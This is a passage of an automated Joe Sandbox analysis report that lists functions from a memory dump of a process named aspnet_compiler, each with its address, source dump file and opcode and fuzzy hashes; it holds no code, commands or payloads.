                                                              • Instruction ID: 7bcd555e2120c07eec53623d45e2204e0c3b4a4bc6bea484c15d4b79d4aedf73
                                                              • Opcode Fuzzy Hash: 5e6695781c4d67d35b5084b598ed8ae497aa17fc2412cac96184966f67dbdde9
                                                              • Instruction Fuzzy Hash: 0A01FC322146129FD324EF6EDC48E67BBB8FF98660F114129E95D871C0E7309A05C7D1
                                                              Function 01A6C460 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b055da1546f45f3dd52581b1a0104998a49b446d4f40b1faca678f9b23cb9b5d
                                                              • Instruction ID: 379a7ec87a6501fcb83c929dedb1f36a9601f880b5520f504dcfde94fa4c6a16
                                                              • Opcode Fuzzy Hash: b055da1546f45f3dd52581b1a0104998a49b446d4f40b1faca678f9b23cb9b5d
                                                              • Instruction Fuzzy Hash: 23116975A0120DEBDB15EFA8C948EAE7BB9FB98360F004059FD4197385DA35EA11CB90
                                                              Function 01A6C97C Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b5527880598befc31d2d1236641ffdc50e2052c0555fa8b453bb78041bd0cd04
                                                              • Instruction ID: aba86cde37f4987b0a1690755b05642d5acbe5fb4b51d9246d9458fac38f34ff
                                                              • Opcode Fuzzy Hash: b5527880598befc31d2d1236641ffdc50e2052c0555fa8b453bb78041bd0cd04
                                                              • Instruction Fuzzy Hash: 751157B26083089FC710DF69C44195BBBE8AF99320F00451EFA98D7390E634E900CBA2
                                                              Function 01AB4A80 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                              • Instruction ID: faf9b5cb75cb97e4285ede577d954ae4af8af298b4781c7f4b43810a9b95de30
                                                              • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                              • Instruction Fuzzy Hash: F001D832200A419FD7219B69D884FD6B7EEFBC9610F04441DE643CB652DA70F850C754
                                                              Function 01A6CA11 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd5b208e7e8d4aec693e0d264f4887680c91d0cd075767566eb7517855f3b882
                                                              • Instruction ID: bd7779230685fbf5af4f70a2212dda71c1a09e9f0b874526404778d773e7ca68
                                                              • Opcode Fuzzy Hash: cd5b208e7e8d4aec693e0d264f4887680c91d0cd075767566eb7517855f3b882
                                                              • Instruction Fuzzy Hash: D31157B56083089FC700DF6DC54195BBBE8AF99360F00851EF998D73A4E634E900CBA2
                                                              Function 019FE016 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction ID: 38be14ecfd0e430a79b9f4f9ef73449701957276bd4138ed6cfd41984059703e
                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction Fuzzy Hash: BF017872204680AFE322871DCA48F377BEDEB84754F0E04A9FA09CB6A1D678DC40C725
                                                              Function 019D826B Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c1d6690450842cc87c09ea0ec23de426fe9901d11a81d3643e3c34c7e749972
                                                              • Instruction ID: 60fe9670da7fae09d6d6402f218137b9a67bff5807ec9e6f2d60b6d121b767b1
                                                              • Opcode Fuzzy Hash: 5c1d6690450842cc87c09ea0ec23de426fe9901d11a81d3643e3c34c7e749972
                                                              • Instruction Fuzzy Hash: 3101F731B00A05EBD714EB69DD009BEBBBDFF80650F058429DA06A7645EE20ED01C691
                                                              Function 01A8EB50 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 52b0e34cce6506df2ca07fa5ee1d031b1dba92373c4851892083f4fe46ad83df
                                                              • Instruction ID: 2362cdadb99a9483863ef01d71bc3b2f4d1c6ca46e08b3ca54352e5d3faf93c4
                                                              • Opcode Fuzzy Hash: 52b0e34cce6506df2ca07fa5ee1d031b1dba92373c4851892083f4fe46ad83df
                                                              • Instruction Fuzzy Hash: 2601A2B1241B01BFD331AF19D944F06BAA8EF55B50F02442EF30A9F390D6B0D9418B54
                                                              Function 019E2582 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3d65d6babd7c2683a3888cf9c587513db5451a2697f9d7e6cd8afe343098f297
                                                              • Instruction ID: 09672f60950a80f98c5d82699e982f3c4d72b44bbeca4f0a18a8c144e2344922
                                                              • Opcode Fuzzy Hash: 3d65d6babd7c2683a3888cf9c587513db5451a2697f9d7e6cd8afe343098f297
                                                              • Instruction Fuzzy Hash: BAF0F932A41711B7C732DB56CD44F077EEDEBC4A90F114428B60997600CA30ED01C7A0
                                                              Function 01A0C073 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction ID: 395b65a75badc446186e084255ba7443ceb02969fdf721c4a6557d91df8d13e8
                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction Fuzzy Hash: CBF0C8B2600615ABD325CF4DDC40E57FBEADBD1B90F058168E515C7224E631ED04CB50
                                                              Function 019DC310 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction ID: c4a8637d6ee567d09070be567e06b9c970db67292fd89513d8d205febcd09af5
                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction Fuzzy Hash: F9F02173254633ABDB32165D8840F6BE5998FE1A64F1A803DF20D9B244CD649D01D7D0
                                                              Function 01A1CA6F Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                              • Instruction ID: 21d1378723c6b03373978972f0e9fa7faa0b0fbe6d786ce9c68bc4d517e4370e
                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                              • Instruction Fuzzy Hash: 0501F432244685ABD323971EC805F59BFAAEF91760F0C80A5FE448B6A6D77CC900C310
                                                              Function 01AB61E5 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 685a5f33ba8127c12b7e3843bcc03099b5eb9bcf5218dbe9d53f60206f7816e5
                                                              • Instruction ID: 1007491ccf8029cd49bde1de06a7959eefeb73c6a29feab6f4600a7959c5be6d
                                                              • Opcode Fuzzy Hash: 685a5f33ba8127c12b7e3843bcc03099b5eb9bcf5218dbe9d53f60206f7816e5
                                                              • Instruction Fuzzy Hash: 23018F71E00259AFDB00DFA9D541AEEBBF8FF58310F14005AE505A7280D738EA01CBA4
                                                              Function 01A663C0 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction ID: 8ec37c3ec17e90c9c8a272901eda4b4a80c0e3be4ac6eef662ad998b30f571f2
                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction Fuzzy Hash: 75F0127210001DBFEF019F95DD80DAF7B7DEB552E8B114125FA1592160D635DE21A7A0
                                                              Function 01A6A4B0 Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07316d2d7ab08b49fabbd9210f42aa30b95ec372b30fba1267c942f121352593
                                                              • Instruction ID: d4afd5553106deec97053b7db9d50bae8536ec53367b75674417d980adefa3cc
                                                              • Opcode Fuzzy Hash: 07316d2d7ab08b49fabbd9210f42aa30b95ec372b30fba1267c942f121352593
                                                              • Instruction Fuzzy Hash: 3201973A111219ABCF129F94DC44EDE7F6AFB4C764F068101FE1A66220C332D971EB81
                                                              Function 019DC0F0 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df893501325e954624d6b8c9eae1d1dbc870869e9b4fbb0f8d7ccaa42e38f207
                                                              • Instruction ID: da49a46bd4ddbcca5515206fafcc3f1639232def9fa4c8e05adbaf6e10f27681
                                                              • Opcode Fuzzy Hash: df893501325e954624d6b8c9eae1d1dbc870869e9b4fbb0f8d7ccaa42e38f207
                                                              • Instruction Fuzzy Hash: C0F0B4712043616BF71596A99D42F7276DAF7D0752F25C06EEB0D8B2C1E9B1DC01C3A4
                                                              Function 01A1656A Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 47bbbc22a6a90b5701b9d94ba906390c0eac0459f524b6332b6799f4bdbf86cd
                                                              • Instruction ID: 7945c23e97dcb663813f6d59c42472ee20d498dd690f6344c376084ad8b7a10f
                                                              • Opcode Fuzzy Hash: 47bbbc22a6a90b5701b9d94ba906390c0eac0459f524b6332b6799f4bdbf86cd
                                                              • Instruction Fuzzy Hash: 6F01A470605A819BF322973DCD48B2537B8BB44B54F4C0194FA45CB6EAE778D441C610
                                                              Function 01A8437C Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction ID: c9a2e0ad3876e8a895854ea8d7a3b6d6c47c11bf19c86132e5b7ca9c86f19faf
                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction Fuzzy Hash: FBF02735745E1397FB36BB2E9420B2EBAA6EFE4E00B09062C9615CB680DF20DC00D790
                                                              Function 01A6C89D Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c94ffed09960acbc9ddb4aed79011626ea76ad6aa65e7229067ad2c9e5b3a61
                                                              • Instruction ID: 8ac8a2054969646605249085e728b0a265501c168058fd871cb0253c8944695f
                                                              • Opcode Fuzzy Hash: 7c94ffed09960acbc9ddb4aed79011626ea76ad6aa65e7229067ad2c9e5b3a61
                                                              • Instruction Fuzzy Hash: 07F0A4706057049FC310EF28C541A1BB7E4FF9C720F40465EB898DB394E634E901C756
                                                              Function 01A6E872 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                              • Instruction ID: 0524d7de363180f90154996999cd301e179b8b1aec5717885db2a51791b60213
                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                              • Instruction Fuzzy Hash: 22F05477B115529BD722DB4DCC80F16B77CEFD5A60F1A0069AA049B260C760EC01C7D0
                                                              Function 01A10854 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                              • Instruction ID: 8b05c542bdce638e32830d840a25628f001b1932333eeababcef6815c11ae0f9
                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                              • Instruction Fuzzy Hash: FEF02472600200EFE315DF21CD00F46B6E9EFDC344F188078A944C7164FAB0ED40C654
                                                              Function 01A6C912 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80c5fffa936fb6ca7f74d0090d5cb74b3815506a699bdd63af757abded87929a
                                                              • Instruction ID: 9aca3ff2d010a9a82abf6b6a253aba41f9701401621ce3101b1c9b61cfe0b5b6
                                                              • Opcode Fuzzy Hash: 80c5fffa936fb6ca7f74d0090d5cb74b3815506a699bdd63af757abded87929a
                                                              • Instruction Fuzzy Hash: 61F06271A01249EFCB04EF69C515E6EB7B4FF58300F408059F955EB385DA38EA01CB60
                                                              Function 019E47FB Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c31247c727aebafbb9e7faffb6d4614162d9a7398893222de624145923475ec7
                                                              • Instruction ID: be9b165eb4571c7fcb359a79c4482c3c2e98757437949e8c9ebebf4c2bef17da
                                                              • Opcode Fuzzy Hash: c31247c727aebafbb9e7faffb6d4614162d9a7398893222de624145923475ec7
                                                              • Instruction Fuzzy Hash: 8CF09A319166E19FE7238B6CC15CB61BBDC9B00622F09896AD58DC7503C724D880CA52
                                                              Function 01AA0115 Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 790cd88475f2e04b552003f20d30bd0de0519bb3d19d4eb634f18c8ad46a1835
                                                              • Instruction ID: dccd624389769264ef9870d119bca1795e82a7bcfde86bc000ac8e4dc75b3051
                                                              • Opcode Fuzzy Hash: 790cd88475f2e04b552003f20d30bd0de0519bb3d19d4eb634f18c8ad46a1835
                                                              • Instruction Fuzzy Hash: 22F0EC6E817BC10ACF325B3C7B903D57FA4A755114F591445D4B697205C674A4C3C724
                                                              Function 01A1C5ED Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 931254f76593f2c1a2c48ebde32cb4adea26308ce41a2f0a5a61a9e8170011ec
                                                              • Instruction ID: 6d765c3ed6f2456f44b377fab7e961ff7bc88ab14169747e29b86f880ea7ce68
                                                              • Opcode Fuzzy Hash: 931254f76593f2c1a2c48ebde32cb4adea26308ce41a2f0a5a61a9e8170011ec
                                                              • Instruction Fuzzy Hash: 6BF0E2715916919FE322971CC148B55BBE8AB847B0F08BC25D52A8751FC260E880CA54
                                                              Function 01A22619 Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction ID: af4d9903a7640f3cc7b8cdd135b86ef02b73f274848cca7cea1e2c3d3fa2be4a
                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction Fuzzy Hash: 16E092723006112BE7219E5D8D84F577B6EDFD2B10F05007AB6045E251C9E69C1982A4
                                                              Function 01A76030 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction ID: 841af2418be7ef3dd1f9d6bf7afd38a944d798593b6d21b11063a0f38addaf8e
                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction Fuzzy Hash: 1CF08C72100604AFF3228F09DC44B92BBB8EB05364F06C029E6089B560D339EC41CBA0
                                                              Function 019E0710 Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                              • Instruction ID: 9865202cab0a6deb2eb5b57355c6661a34e5e87950c5540e6a832544fa9fd4da
                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                              • Instruction Fuzzy Hash: 52F0E539304345DBDF17CF1AC450AA57BE4FB81350B040455F84A8B342D776EA82CB90
                                                              Function 01A149D0 Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                              • Instruction ID: 77aeac360d9b11b503e45cc098cb69d706fa73949139feaa89774ec8bb85d40e
                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                              • Instruction Fuzzy Hash: 64E0DF37244285AFD3212F5D8800B6A7FAAEBD87A0F1B0429E244CB258DB70DC40C7E8
                                                              Function 01A8678E Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                              • Instruction ID: aaf61e3f277ca7392d16c2efd263d4e14e5e3a55afe48235c1931c77ccd48af9
                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                              • Instruction Fuzzy Hash: EFE0DF32A00110BBEB21AB998E05F9ABEACDB94FA0F050054B608E70E0E530EE00C6D0
                                                              Function 019E25E0 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6fe58ab427b671ed77a3f32044271d6eb00fec66f1f8905c54f735d103144191
                                                              • Instruction ID: b4f145f9c3b14a028b093e64192b46b994d73397aa70fa8ec2f9b2c87dad1dca
                                                              • Opcode Fuzzy Hash: 6fe58ab427b671ed77a3f32044271d6eb00fec66f1f8905c54f735d103144191
                                                              • Instruction Fuzzy Hash: B3E09232100954ABC722BF29DD05F9A77DAEBA4760F014519F11957190CA34A910C784
                                                              Function 01A64000 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                              • Instruction ID: c9d49f1664c1cf6f51dc3bbe9191604897ec8d3ebcd0ca60e2f6b6255fc2f176
                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                              • Instruction Fuzzy Hash: EDE0C2343003168FE715CF19C040B627BBABFD9A20F29C068A9488F305EB36E842CB40
                                                              Function 01A1CA38 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
